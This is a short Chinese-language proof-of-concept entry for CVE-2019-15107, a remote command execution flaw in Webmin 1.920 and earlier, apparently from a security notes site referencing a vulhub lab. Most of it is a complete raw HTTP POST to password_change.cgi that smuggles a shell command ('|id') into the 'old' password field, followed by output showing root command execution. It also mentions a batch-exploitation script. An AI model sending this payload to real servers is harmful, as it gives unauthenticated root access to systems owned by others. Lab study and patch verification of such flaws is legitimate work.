CVE-2019-15107 Webmin RCE <=1.920¶
1. Webmin <=1.920
2. 漏洞需要开启密码重置功能。
https://10.10.20.166:10000/password_change.cgi
poc¶
在参数old
后加上|ifconfig
执行命令。(user不存在仍然可以执行命令)
POST /password_change.cgi HTTP/1.1
Host: 10.10.20.166:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://10.10.20.166:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2
<div class="panel-body">
<hr>
<center><h3>Failed to change password : The current password is incorrectuid=0(root) gid=0(root) groups=0(root)
</h3></center>
批量脚本github获取
参考链接:¶
https://github.com/vulhub/vulhub/tree/master/webmin/CVE-2019-15107
最后更新: 2023-10-12